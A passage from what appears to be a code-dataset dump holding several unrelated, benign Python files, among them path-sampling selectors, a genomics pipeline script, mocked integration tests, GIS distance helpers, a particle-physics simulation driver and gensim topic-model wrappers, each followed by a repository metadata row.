self.motor_position_label.setText(str(position))
self.mp.set_motor_position(self.motor_slider.value(), self.motor_drive_mode.currentIndex(), self.motor_hold_position.isChecked())
| gpl-2.0 | -8,878,518,259,202,620,000 | 38.548872 | 137 | 0.687833 | false | 3.833819 | false | false | false |
openpathsampling/openpathsampling | openpathsampling/shooting.py | 2 | 7855 | import math
import logging
import numpy as np
from openpathsampling.netcdfplus import StorableNamedObject
from openpathsampling import default_rng
logger = logging.getLogger(__name__)
init_log = logging.getLogger('openpathsampling.initialization')
class ShootingPointSelector(StorableNamedObject):
def __init__(self):
# Assign rng, so it can be set to something else
self._rng = default_rng()
super(ShootingPointSelector, self).__init__()
def f(self, snapshot, trajectory):
"""
Returns the unnormalized proposal probability of a snapshot
Notes
-----
In principle this is an collectivevariable so we could easily add
caching if useful
"""
return 1.0
def probability(self, snapshot, trajectory):
sum_bias = self.sum_bias(trajectory)
if sum_bias > 0.0:
return self.f(snapshot, trajectory) / sum_bias
else:
return 0.0
def probability_ratio(self, snapshot, old_trajectory, new_trajectory):
p_old = self.probability(snapshot, old_trajectory)
p_new = self.probability(snapshot, new_trajectory)
return p_new / p_old
def _biases(self, trajectory):
"""
Returns a list of unnormalized proposal probabilities for all
snapshots in trajectory
"""
return [self.f(s, trajectory) for s in trajectory]
def sum_bias(self, trajectory):
"""
Returns the unnormalized probability probability of a trajectory.
This is just the sum of all proposal probabilities in a trajectory.
Notes
-----
For a uniform distribution this is proportional to the length of the
trajectory. In this case we can estimate the maximal accepted
trajectory length for a given acceptance probability.
After we have generated a new trajectory the acceptance probability
only for the non-symmetric proposal of different snapshots is given
by `probability(old_trajectory) / probability(new_trajectory)`
"""
return sum(self._biases(trajectory))
def pick(self, trajectory):
"""
Returns the index of the chosen snapshot within `trajectory`
Notes
-----
The native implementation is very slow. Simple picking algorithm
should override this function.
"""
prob_list = self._biases(trajectory)
sum_bias = sum(prob_list)
rand = self._rng.random() * sum_bias
idx = 0
prob = prob_list[0]
while prob <= rand and idx < len(prob_list):
idx += 1
prob += prob_list[idx]
return idx
class GaussianBiasSelector(ShootingPointSelector):
r"""
A selector that biases according to a Gaussian along specified
:class:`.CollectiveVariable`, with mean ``l_0`` and width parameter
``alpha``. That is, for snapshot :math:`x` and CV :math:`\lambda`, the
selection probability for each frame is weighted according to the
function
.. math::
P_\text{sel}(x) \propto \exp(-\alpha (\lambda(x) - l_0)^2)
Note that normalization here depends on the trajectory that the
snapshot is a part of: the sum of the probabilities for all frames
is 1, which gives a different normalization constant than the standard
Gaussian distribution normalization, and exact probabilities for
selecting a given snapshot will change depending on the trajectory it is
a part of.
Parameters
----------
collectivevariable : :class:`.CollectiveVariable`
the axis to use for the Gaussian
alpha : float
the width of the Gaussian
l_0 : float
the center of the Gaussian
"""
def __init__(self, collectivevariable, alpha=1.0, l_0=0.5):
super(GaussianBiasSelector, self).__init__()
self.collectivevariable = collectivevariable
self.alpha = alpha
self.l_0 = l_0
def f(self, snapshot, trajectory):
l_s = self.collectivevariable(snapshot)
return math.exp(-self.alpha * (l_s - self.l_0) ** 2)
class BiasedSelector(ShootingPointSelector):
"""General biased shooting point selector
Takes any function (wrapped in an OPS CV) and uses that as the bias for
selecting the shooting point.
Parameters
----------
func : :class:`.CollectiveVariable`
A function wrapped in an OPS CV which gives the relative bias.
"""
def __init__(self, func):
super(BiasedSelector, self).__init__()
self.func = func
def f(self, snapshot, trajectory):
return self.func(snapshot)
class UniformSelector(ShootingPointSelector):
"""
Selects random frame in range `pad_start` to `len(trajectory-pad_end`.
Attributes
----------
pad_start : int
number of frames at beginning of trajectory to be excluded from
selection
pad_end : int
number of frames at end of trajectory to be excluded from selection
"""
def __init__(self, pad_start=1, pad_end=1):
super(UniformSelector, self).__init__()
self.pad_start = pad_start
self.pad_end = pad_end
def f(self, frame, trajectory=None):
return 1.0
def sum_bias(self, trajectory):
return float(len(trajectory) - self.pad_start - self.pad_end)
def pick(self, trajectory):
idx = self._rng.integers(self.pad_start,
len(trajectory) - self.pad_end)
return idx
class InterfaceConstrainedSelector(ShootingPointSelector):
"""
Selects first frame outside of volume.
Parameters
----------
volume : :class:`.Volume`
defines Volume for which the first frame outside of this interface
volume is found
"""
def __init__(self, volume):
super(InterfaceConstrainedSelector, self).__init__()
self.volume = volume
def f(self, frame, trajectory=None):
idx = trajectory.index(frame)
if idx == self.pick(trajectory):
return 1.0
else:
return 0.0
def sum_bias(self, trajectory):
return 1.0
def pick(self, trajectory):
for idx, frame in enumerate(trajectory):
if not self.volume(frame):
break
if idx == len(trajectory)-1 and self.volume(frame):
raise RuntimeError("Interface constrained shooting move did "
" not find valid crossing point")
return idx
class FinalFrameSelector(ShootingPointSelector):
"""
Pick final trajectory frame as shooting point.
This is used for "forward" extension in, e.g., the minus move.
"""
def f(self, frame, trajectory):
if trajectory.index(frame) == len(trajectory) - 1:
return 1.0
else:
return 0.0
def pick(self, trajectory):
return len(trajectory)-1
def probability(self, snapshot, trajectory): # pragma: no cover
return 1.0 # there's only one choice
def probability_ratio(self, snapshot, old_trajectory, new_trajectory):
# must be matched by a final-frame selector somewhere
return 1.0
class FirstFrameSelector(ShootingPointSelector):
"""
Pick first trajectory frame as shooting point.
This is used for "backward" extension in, e.g., the minus move.
"""
def f(self, frame, trajectory):
if trajectory.index(frame) == 0:
return 1.0
else:
return 0.0
def pick(self, trajectory):
return 0
def probability(self, snapshot, trajectory): # pragma: no cover
return 1.0 # there's only one choice
def probability_ratio(self, snapshot, old_trajectory, new_trajectory):
# must be matched by a first-frame selector somewhere
return 1.0
| mit | -6,294,389,502,952,380,000 | 29.445736 | 76 | 0.629663 | false | 4.390721 | false | false | false |
iskandr/cohort-seq2hla | cohort-seq2hla.py | 1 | 5885 |
# Copyright (c) 2015. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from glob import glob
import logging
from os.path import join, exists, isdir
from os import listdir
import subprocess
parser = argparse.ArgumentParser()
parser.add_argument(
"--base-dir",
default="/hdfs/datasets/martignetti_ovarian/",
help="Directory which contains DNA & RNA samples for sample groups")
parser.add_argument(
"--rna-subdir",
default=join(
"Illumina_RNA",
"QC_S106.B202_PCT189_RNA.PE.RNASeqRibozero.RAPiD.Human"),
help="Subdirectory which contains all RNA samples in a group")
parser.add_argument(
"--rna-fastq-subdir",
default="Raw/RNA.IlluminaHiSeq2500.RiboZero/",
help="Within a particular RNA sample's dir, where are the FASTQ files")
parser.add_argument(
"--left-reads-pattern",
default="*_R1_*.fastq.gz",
help="Wildcard pattern for FASTQ files containing left reads of mate-pairs")
parser.add_argument(
"--right-reads-pattern",
default="*_R2_*.fastq.gz",
help="Wildcard pattern for FASTQ files containing left reads of mate-pairs")
parser.add_argument(
"--seq2hla-path",
default="../seq2hla/seq2HLA.py",
help="Where is the seq2HLA repository located?")
parser.add_argument(
"--temp-fastq-dir",
default=".",
help="Dir for concatenated FASTQ's (seq2HLA can't handle multiple lanes)")
args = parser.parse_args()
def paths_from_pattern(base_dir, pattern):
full_pattern = join(base_dir, pattern)
paths = [
join(base_dir, filename)
for filename in glob(full_pattern)
]
if len(paths) == 0:
raise ValueError("No FASTQ files found for %s" % full_pattern)
return paths
def concat_compressed_fastq_files(
group_name,
sample_name,
suffix,
fastq_paths,
target_dir):
"""
Returns process so we can start multiple concat jobs simultaneously
"""
combined_fastq_name = "%s_%s_%s.fastq" % (
group_name,
sample_name,
suffix)
combined_fastq_path = join(target_dir, combined_fastq_name)
logging.info(
"Combining %d FASTQ files into %s",
len(fastq_paths),
combined_fastq_path)
with open(combined_fastq_path, 'w') as output_file:
process = subprocess.Popen(
args=["zcat"] + fastq_paths,
stdout=output_file)
return combined_fastq_path, process
if __name__ == "__main__":
if not exists(args.base_dir):
raise ValueError("Directory '%s' does not exist" % args.base_dir)
# dictionary mapping sample group names to directory paths
group_paths = {}
for group_name in listdir(args.base_dir):
group_path = join(args.base_dir, group_name)
if isdir(group_path):
logging.info("Sample group %s => %s", group_name, group_path)
group_paths[group_name] = group_path
# dictionary mapping (group_name, sample_name) pairs full paths
sample_paths = {}
for (group_name, group_path) in group_paths.items():
rna_path = join(group_path, args.rna_subdir)
if not exists(rna_path):
raise ValueError(
"Missing RNA subdirectory for sample group %s, expected %s" % (
group_name, rna_path))
for sample_name in listdir(rna_path):
sample_path = join(rna_path, sample_name)
if isdir(sample_path):
logging.info("Sample %s:%s => %s",
group_name,
sample_name,
sample_path)
sample_paths[(group_name, sample_name)] = sample_path
for ((group_name, sample_name), sample_path) in sample_paths.items():
logging.info("Looking for FASTQ files for %s:%s" % (
group_name, sample_name))
fastq_path = join(sample_path, args.rna_fastq_subdir)
if not exists(fastq_path):
raise ValueError("Missing FASTQ subdirectory '%s' for %s:%s" % (
fastq_path,
group_name,
sample_name))
left_fastq_paths = paths_from_pattern(
fastq_path,
args.left_reads_pattern)
left_combined_fastq_path, p_left = concat_compressed_fastq_files(
group_name=group_name,
sample_name=sample_name,
suffix="R1",
fastq_paths=left_fastq_paths,
target_dir=args.temp_fastq_dir)
right_fastq_paths = paths_from_pattern(
fastq_path,
args.right_reads_pattern)
right_combined_fastq_path, p_right = concat_compressed_fastq_files(
group_name=group_name,
sample_name=sample_name,
suffix="R2",
fastq_paths=right_fastq_paths,
target_dir=args.temp_fastq_dir)
if p_left.wait() != 0:
raise ValueError("Concat of left reads failed")
if p_right.wait() != 0:
raise ValueError("Concat of right reads failed")
subprocess.check_call(
[
"python", args.seq2hla_path,
"-1", left_combined_fastq_path,
"-2", right_combined_fastq_path,
"-r", "%s_%s" % (group_name, sample_name)
]) | apache-2.0 | -1,169,457,863,651,158,800 | 33.421053 | 80 | 0.603398 | false | 3.746022 | false | false | false |
demisto/content | Packs/Gamma/Integrations/Gamma/Gamma_test.py | 1 | 13515 | import json
import pytest
import demistomock as demisto
from Gamma import Client, fetch_incidents, Command, main
MOCK_URL = "mock://fake-api.net"
MOCK_VIOLATION = {
"response": [{
"app_name": "jira",
"dashboard_url": f'{MOCK_URL}/violationId/2036',
"file_labels_map": {},
"text_labels": [],
"user": {
"active_directory_user_id": None,
"atlassian_account_id": None,
"email_address": None,
"github_handle": None,
"name": "Amane Suzuha",
"slack_user_id": None
},
"violation_category": "mock_category",
"violation_event_timestamp": 1605805555,
"violation_id": 2036,
"violation_status": "OPEN"
}]
}
MOCK_VIOLATION_2 = {
"response": [{
"app_name": "jira",
"dashboard_url": f'{MOCK_URL}/violationId/5100',
"file_labels_map": {},
"text_labels": [],
"user": {
"active_directory_user_id": None,
"atlassian_account_id": None,
"email_address": None,
"github_handle": None,
"name": "Rintaro Okabe",
"slack_user_id": None
},
"violation_category": "mock_category",
"violation_event_timestamp": 1605804455,
"violation_id": 5100,
"violation_status": "OPEN"
}]
}
MOCK_VIOLATION_2_UPDATED = {
"response": [{
"app_name": "jira",
"dashboard_url": f'{MOCK_URL}/violationId/5100',
"file_labels_map": {},
"text_labels": [],
"user": {
"active_directory_user_id": None,
"atlassian_account_id": None,
"email_address": None,
"github_handle": None,
"name": "Rintaro Okabe",
"slack_user_id": None
},
"violation_category": "mock_category",
"violation_event_timestamp": 1605804455,
"violation_id": 5100,
"violation_status": "RESOLVED"
}]
}
MOCK_ALL_VIOLATIONS = {
'response': [
MOCK_VIOLATION['response'][0],
MOCK_VIOLATION_2['response'][0]
]
}
def mock_demisto(mocker, args_value=None, command_value=None):
mocker.patch.object(demisto, "results")
mocker.patch.object(
demisto,
'params',
return_value={'api_key': 'thisisatestkey', 'url': MOCK_URL}
)
if not args_value:
args_value = {
"entryID": "entry_id",
"parseAll": "yes",
"codec": "utf-8"
}
if command_value:
mocker.patch.object(
demisto,
'command',
return_value=command_value
)
mocker.patch.object(demisto, "args", return_value=args_value)
def mock_client(mocker, demisto):
mocker.patch.object(
demisto,
'params',
return_value={'api_key': 'thisisatestkey', 'url': MOCK_URL}
)
client = Client(demisto)
return client
@pytest.mark.parametrize("last_run_violation,first_fetch_violation,max_results,output_1,output_2", [
({}, "1", "10", "Gamma Violation 2036", 5100),
({}, "1", "0", "Gamma Violation 2036", 5100),
({}, "1", "-1", "Gamma Violation 2036", 5100),
({}, "1", "200", "Gamma Violation 2036", 5100)
])
def test_fetch_incidents(last_run_violation, first_fetch_violation, max_results,
output_1, output_2, requests_mock, mocker):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
# Test fetch
next_run, incidents = fetch_incidents(mock_client(mocker, demisto),
last_run_violation,
first_fetch_violation,
max_results)
mocker.patch.object(demisto, 'incidents', incidents)
assert output_1 == demisto.incidents[0]['name']
assert output_2 == next_run['starting_violation']
@pytest.mark.parametrize("next_run,first_fetch_violation,max_results,output_1,output_2", [
({'starting_violation': 2036}, "1", "10", 1, 5100),
({'starting_violation': 5100}, "1", "10", 0, 5100)
])
def test_fetch_incidents_next_fetch(next_run, first_fetch_violation, max_results,
output_1, output_2, requests_mock, mocker):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
next_run, incidents = fetch_incidents(mock_client(mocker, demisto),
next_run,
first_fetch_violation,
max_results)
assert output_1 == len(incidents)
assert output_2 == next_run['starting_violation']
@pytest.mark.parametrize("last_run_violation,first_fetch_violation,max_results,output", [
({}, "0", "10", "first_fetch_violation must be equal to 1 or higher"),
({}, "-1", "10", "first_fetch_violation must be equal to 1 or higher"),
({}, "test", "10", "first_fetch_violation and max_limit must be integers"),
({}, "1", "test", "first_fetch_violation and max_limit must be integers"),
])
def test_fetch_incidents_bad_input(last_run_violation, first_fetch_violation,
max_results, output, mocker):
with pytest.raises(ValueError) as err:
fetch_incidents(mock_client(mocker, demisto),
last_run_violation,
first_fetch_violation,
max_results)
assert output == str(err.value)
def test_get_violation_command(requests_mock, mocker, capfd):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
args = {"violation": "2036"}
mock_demisto(mocker, args, 'gamma-get-violation')
with capfd.disabled():
main()
content = demisto.results.call_args[0][0]['Contents'][0]['violation_id']
assert 2036 == content
@pytest.mark.parametrize("demisto_args,output", [
({"violation": "0"}, "Violation must be greater than 0"),
({"violation": "-1"}, "Violation must be greater than 0"),
({"violation": "test"}, "invalid literal for int() with base 10: 'test'"),
])
def test_get_violation_command_bad_input(demisto_args, output, mocker):
client = mock_client(mocker, demisto)
with pytest.raises(ValueError) as err:
Command.get_violation(client, demisto_args)
assert output == str(err.value)
@pytest.mark.parametrize("demisto_args,output", [
({"minimum_violation": "2036", "limit": "2"}, 2036),
({"minimum_violation": "2035", "limit": "2"}, 2036),
])
def test_get_violation_list_command(demisto_args, output, requests_mock, mocker, capfd):
requests_mock.get(MOCK_URL + "/api/discovery/v1/violation/list", json=MOCK_ALL_VIOLATIONS)
mock_demisto(mocker, demisto_args, "gamma-get-violation-list")
with capfd.disabled():
main()
content = demisto.results.call_args[0][0]['Contents'][0]['violation_id']
assert output == content
@pytest.mark.parametrize("demisto_args,output", [
({"minimum_violation": "0", "limit": "2"}, "minimum_violation must be greater than 0"),
({"minimum_violation": "test", "limit": "2"}, "invalid literal for int() with base 10: 'test'"),
({"minimum_violation": "-1", "limit": "2"}, "minimum_violation must be greater than 0"),
({"minimum_violation": "2035", "limit": "0"}, "limit must be between 1 and 100"),
({"minimum_violation": "2035", "limit": "-1"}, "limit must be between 1 and 100"),
({"minimum_violation": "2035", "limit": "test"},
"invalid literal for int() with base 10: 'test'"),
])
def test_get_violation_list_command_bad_input(demisto_args, output, mocker):
client = mock_client(mocker, demisto)
with pytest.raises(ValueError) as err:
Command.get_violation_list(client, demisto_args)
assert output == str(err.value)
@pytest.mark.parametrize("demisto_args,demisto_command,output", [
(
{"violation": "5100", "status": "resolved", "notes": "This has been updated!"},
"gamma-update-violation",
'RESOLVED',
),
])
def test_update_violation_command(demisto_args, demisto_command, output,
requests_mock, mocker, capfd):
test_violation = 5100
requests_mock.put(MOCK_URL + f'/api/discovery/v1/violation/{test_violation}',
json=MOCK_VIOLATION_2)
requests_mock.get(MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION_2_UPDATED)
mock_demisto(mocker, demisto_args, demisto_command)
with capfd.disabled():
main()
contents = demisto.results.call_args[0][0]['Contents'][0]['violation_status']
assert output == contents
@pytest.mark.parametrize("demisto_args,output", [
(
{"violation": "0", "status": "resolved", "notes": "This has been updated!"},
"Violation must be greater than 0"
),
(
{"violation": "-1", "status": "resolved", "notes": "This has been updated!"},
"Violation must be greater than 0"
),
(
{"violation": "test", "status": "resolved", "notes": "This has been updated!"},
"invalid literal for int() with base 10: 'test'"
),
(
{"violation": "5100", "status": "closed", "notes": "This has been updated!"},
"Status must be one of the following: OPEN, RESOLVED, IGNORED"
),
])
def test_update_violation_command_bad_input(demisto_args, output, mocker):
client = mock_client(mocker, demisto)
with pytest.raises(ValueError) as err:
Command.update_violation(client, demisto_args)
assert output == str(err.value)
@pytest.mark.parametrize("demisto_args,demisto_command,output_1,output_2", [
({}, "fetch-incidents", "Gamma Violation 2036", "Gamma Violation 5100"),
({'first_fetch_violation': "2036", 'max_results': "5"}, "fetch-incidents",
"Gamma Violation 2036", "Gamma Violation 5100"),
])
def test_main_fetch_incidents(demisto_args, demisto_command, output_1, output_2,
requests_mock, mocker, capfd):
# Test fetch
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
mock_demisto(mocker, demisto_args, demisto_command)
with capfd.disabled():
main()
contents = json.loads(demisto.results.call_args[0][0]["Contents"])
assert output_1 == contents[0]["name"]
assert output_2 == contents[1]["name"]
def test_main_get_violation_list(requests_mock, mocker, capfd):
# Test fetch
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_ALL_VIOLATIONS
)
args = {'minimum_id': "2036", 'limit': "5"}
command = 'gamma-get-violation-list'
mock_demisto(mocker, args, command)
with capfd.disabled():
main()
response = demisto.results.call_args[0][0]["Contents"]
assert {2036, 5100} == {i["violation_id"] for i in response}
def test_main_get_bad_violation(mocker, requests_mock, capfd):
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
# Test wrong ID
command = "gamma-get-violation"
args = {"violation": "5100"}
mock_demisto(mocker, args, command)
with pytest.raises(SystemExit):
with capfd.disabled():
main()
assert demisto.results.call_args[0][0]['Contents'] == "Failed to execute gamma-get-violation " \
"command.\nError:\nViolation with this " \
"ID does not exist."
def test_main_get_violation(requests_mock, mocker, capfd):
# Test get violation
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
args = {'violation': "2036"}
command = 'gamma-get-violation'
mock_demisto(mocker, args, command)
with capfd.disabled():
main()
assert 2036 == demisto.results.call_args[0][0]["Contents"][0]["violation_id"]
def test_main_update(requests_mock, mocker, capfd):
# Test get violation
test_violation = 2036
requests_mock.put(
MOCK_URL + f"/api/discovery/v1/violation/{test_violation}",
json=MOCK_VIOLATION
)
requests_mock.get(
MOCK_URL + "/api/discovery/v1/violation/list",
json=MOCK_VIOLATION
)
args = {'violation': f"{test_violation}", 'status': 'RESOLVED', 'notes': ''}
command = 'gamma-update-violation'
mock_demisto(mocker, args, command)
with capfd.disabled():
main()
assert test_violation == demisto.results.call_args[0][0]["Contents"][0]["violation_id"]
def test_bad_command(mocker, capfd):
test_violation = 2036
args = {'violation': f"{test_violation}", 'status': 'resolved', 'notes': ''}
command = 'gamma-violation-update'
mock_demisto(mocker, args, command)
with pytest.raises(SystemExit):
with capfd.disabled():
main()
assert demisto.results.call_args[0][0]['Contents'] == "Failed to execute " \
"gamma-violation-update " \
"command.\nError:\nCommand " \
"\"gamma-violation-update\" is not " \
"implemented."
| mit | -614,382,760,543,915,300 | 35.04 | 100 | 0.57943 | false | 3.459176 | true | false | false |
mvollmer/cockpit | bots/machine/machine_core/constants.py | 2 | 1177 | # -*- coding: utf-8 -*-
# This file is part of Cockpit.
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Cockpit is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
#
# Cockpit is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Cockpit; If not, see <http://www.gnu.org/licenses/>.
import os
# Images which are Atomic based
ATOMIC_IMAGES = ["rhel-atomic", "fedora-atomic", "continuous-atomic"]
MACHINE_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
BOTS_DIR = os.path.dirname(MACHINE_DIR)
TEST_DIR = os.path.join(os.path.dirname(BOTS_DIR), "test")
DEFAULT_IDENTITY_FILE = os.path.join(MACHINE_DIR, "identity")
TEST_OS_DEFAULT = "fedora-29"
DEFAULT_IMAGE = os.environ.get("TEST_OS", TEST_OS_DEFAULT)
| lgpl-2.1 | 5,782,083,369,937,720,000 | 36.967742 | 74 | 0.737468 | false | 3.324859 | false | false | false |
schocco/mds-web | apps/trails/gis_math.py | 1 | 5200 | from bisect import bisect
from django.contrib.gis.geos.point import Point
import math
def haversine(origin, destination):
'''
:param origin: start position
:param destination: end position
:return: length in meters
.. See::
http://www.movable-type.co.uk/scripts/gis-faq-5.1.html
'''
lat1, lon1 = origin
lat2, lon2 = destination
# Earth radius varies from 6356.752 km at the poles
# to 6378.137 km at the equator, use something in
# between.
radius = radius_for_lat(lat1) # m
dlat = math.radians(lat2-lat1)
dlon = math.radians(lon2-lon1)
a = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(lat1)) \
* math.cos(math.radians(lat2)) * math.sin(dlon/2) * math.sin(dlon/2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = radius * c
return d
def radius_for_lat(lat):
'''
Rt = radius of earth at latitude t
maxr = major radius of earth = 6,378,137 meters
minr = minor radius of earth = 6,356,752.31420 meters
Rt= SQRT( (((minr^2cos(t))^2)+((maxr^2sin(t))^2))/ ((acos(t))^2 + (maxr * sin(t)^2))
:return: radius for given latitude in m
.. See::
http://en.wikipedia.org/wiki/Earth_radius#Radius_at_a_given_geodetic_latitude
'''
maxr = 6378137.0 # m
minr = 6356752.0 # m
d = (minr**2 * math.cos(lat))**2 + (maxr**2 * math.sin(lat))**2
div = (minr * math.cos(lat))**2 + (maxr * math.sin(lat))**2
rlat = math.sqrt(d/div)
return rlat
class RasterRow:
"""
Representation of one data point of the rastered data.
"""
def __init__(self):
self.length_degree = 0
self.length_meters = 0
self.length_degree_cum = 0
self.length_meters_cum = 0
self.altitude = 0
self.slope = 0
class RasterMap:
'''
Class to calculate approximated information about a trail object.
Uses a few data points of the original data to speed up calculation.
'''
def __init__(self, trail):
#flatten multilinestring to linestring
self.linestring = [point for linestring in trail.waypoints for point in linestring]
self.length = trail.waypoints.length
self.length_m = trail.trail_length or 0
self.rasterRows = []
self.distances = [] #4th dimension of linestring with cumulative distance to the start point
self.build()
self.raster()
def build(self):
#calculate distance at each point in the linestring
b = Point(self.linestring[0])
distance_cum = 0
for p in self.linestring:
a = b
b = Point(p)
distance = a.distance(b)
distance_cum += distance
self.distances.append(distance_cum)
def raster(self):
'''
Divide a track into equally long sections and get the altitude at each point.
According to the MDS document a section is a part of the track of 5-20 meters.
'''
# the size of the segments should be chosen so that the calculation effort is not too cpu intensive
steps = 0
if self.length_m <= 1000:
#5m is the minimum section length according to the mds document
steps = self.length_m/5
elif self.length_m > 30000:
#50m segments for tracks longer than 30km
steps = self.length_m/50
elif self.length_m > 1000:
# use 20m segments for tracks between 1 and 30km
steps = self.length_m/20
row = None
for step in range(int(steps)):
prev_row = row
row = RasterRow()
row.length_degree = self.length / steps
row.length_degree_cum = row.length_degree * step
row.length_meters = self.length_m / steps
row.length_meters_cum = row.length_meters * step
if(row.length_degree_cum in self.distances):
row.altitude = self.linestring[self.distances.index(row.length_degree_cum)][2]
else:
# get index of element closest to the needed value
right_idx = bisect(self.distances, row.length_degree_cum)
# distances[i] is lower than the value, so i+1 is the right neighbour
left_idx = right_idx - 1
if(right_idx >= len(self.linestring)):
# the right index can be out of range
# in that case we can simply use the last value instead of interpolating
row.altitude = self.linestring[-1][2]
else:
# now interpolate
h0 = self.linestring[left_idx][2]
h1 = self.linestring[right_idx][2]
x0 = self.distances[left_idx]
x1 = self.distances[right_idx]
row.altitude = h0 + (h1-h0)/(x1-x0) * (row.length_degree_cum - x0)
self.rasterRows.append(row)
if(prev_row is not None and row.length_meters != 0):
row.slope = float((row.altitude - prev_row.altitude)/row.length_meters) | mit | 8,821,322,964,885,942,000 | 36.15 | 107 | 0.572885 | false | 3.698435 | false | false | false |
mice-software/maus | bin/simulate_mice.py | 1 | 2540 | #!/usr/bin/env python
"""
Simulate the MICE experiment
This will simulate MICE spills through the entirety of MICE using Geant4, then
digitize and reconstruct TOF and tracker hits to space points.
"""
import io # generic python library for I/O
import MAUS # MAUS libraries
def run():
""" Run the macro
"""
# This input generates empty spills, to be filled by the beam maker later on
my_input = MAUS.InputPySpillGenerator()
# Create an empty array of mappers, then populate it
# with the functionality you want to use.
my_map = MAUS.MapPyGroup()
# GEANT4
my_map.append(MAUS.MapPyBeamMaker()) # beam construction
my_map.append(MAUS.MapCppSimulation()) # geant4 simulation
# Pre detector set up
# my_map.append(MAUS.MapPyMCReconSetup()) # geant4 simulation
my_map.append(MAUS.MapCppMCReconSetup()) # geant4 simulation
# TOF
my_map.append(MAUS.MapCppTOFMCDigitizer()) # TOF MC Digitizer
my_map.append(MAUS.MapCppTOFSlabHits()) # TOF MC Slab Hits
my_map.append(MAUS.MapCppTOFSpacePoints()) # TOF Space Points
# KL
my_map.append(MAUS.MapCppKLMCDigitizer()) # KL MC Digitizer
my_map.append(MAUS.MapCppKLCellHits()) # KL CellHit Reco
# SciFi
my_map.append(MAUS.MapCppTrackerMCDigitization()) # SciFi electronics model
my_map.append(MAUS.MapCppTrackerClusterRecon()) # SciFi channel clustering
my_map.append(MAUS.MapCppTrackerSpacePointRecon()) # SciFi spacepoint recon
my_map.append(MAUS.MapCppTrackerPatternRecognition()) # SciFi track finding
my_map.append(MAUS.MapCppTrackerPRSeed()) # Set the Seed from PR
# my_map.append(MAUS.MapCppTrackerPRFullSeed()) # Set the Seed from PR
my_map.append(MAUS.MapCppTrackerTrackFit()) # SciFi track fit
# EMR
my_map.append(MAUS.MapCppEMRMCDigitization()) # EMR MC Digitizer
my_map.append(MAUS.MapCppEMRSpacePoints()) # EMR Space Points
my_map.append(MAUS.MapCppEMRRecon()) # EMR Recon
# Ckov
my_map.append(MAUS.MapCppCkovMCDigitizer())
# Global Digits - post detector digitisation
# Then construct a MAUS output component - filename comes from datacards
my_output = MAUS.OutputCppRoot()
# can specify datacards here or by using appropriate command line calls
datacards = io.StringIO(u"")
# The Go() drives all the components you pass in, then check the file
# (default simulation.out) for output
MAUS.Go(my_input, my_map, MAUS.ReducePyDoNothing(), my_output, datacards)
if __name__ == '__main__':
run()
| gpl-3.0 | 6,921,036,674,128,893,000 | 33.794521 | 80 | 0.709843 | false | 3.190955 | false | false | false |
StevenReitsma/gensim-sklearn-wrapper | gensim_wrapper.py | 1 | 3933 | import numpy as np
from gensim import corpora, models, matutils
from sklearn.base import BaseEstimator
class LdaTransformer(BaseEstimator):
"""
See http://radimrehurek.com/gensim/models/ldamodel.html for parameter usage.
X should be a list of tokens for each document, e.g. [['This', 'is', 'document', '1'], ['Second', 'document']]
"""
def __init__(self, n_latent_topics = 100, use_tfidf = False, distributed = False, chunksize = 2000, passes = 1, update_every = 1, alpha = 'symmetric', eta = None, decay = 0.5, eval_every = 10, iterations = 50, gamma_threshold = 0.001):
self.n_latent_topics = n_latent_topics
self.distributed = distributed
self.chunksize = chunksize
self.passes = passes
self.update_every = update_every
self.alpha = alpha
self.eta = eta
self.decay = decay
self.eval_every = eval_every
self.iterations = iterations
self.gamma_threshold = gamma_threshold
self.use_tfidf = use_tfidf
def transform(self, X):
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
corpus = self.tfidf[corpus]
corpus_lda = self.model[corpus]
corpus_lda_dense = matutils.corpus2dense(corpus_lda, self.n_latent_topics).T
return corpus_lda_dense
def fit(self, X, y=None):
self.dictionary = corpora.Dictionary(X)
corpus = [self.dictionary.doc2bow(text) for text in X]
if self.use_tfidf:
self.tfidf = models.TfidfModel(corpus)
corpus = self.tfidf[corpus]
self.model = models.LdaModel(corpus, id2word = self.dictionary, num_topics = self.n_latent_topics, distributed = self.distributed, chunksize = self.chunksize, passes = self.passes, update_every = self.update_every, alpha = self.alpha, eta = self.eta, decay = self.decay, eval_every = self.eval_every, iterations = self.iterations, gamma_threshold = self.gamma_threshold)
return self
def get_params(self, deep = False):
return {'n_latent_topics': self.n_latent_topics, 'distributed': self.distributed, 'chunksize': self.chunksize, 'passes': self.passes, 'update_every': self.update_every, 'alpha': self.alpha, 'eta': self.eta, 'decay': self.decay, 'eval_every': self.eval_every, 'iterations': self.iterations, 'gamma_threshold': self.gamma_threshold}
class LsiTransformer(BaseEstimator):
"""
See http://radimrehurek.com/gensim/models/lsimodel.html for parameter usage.
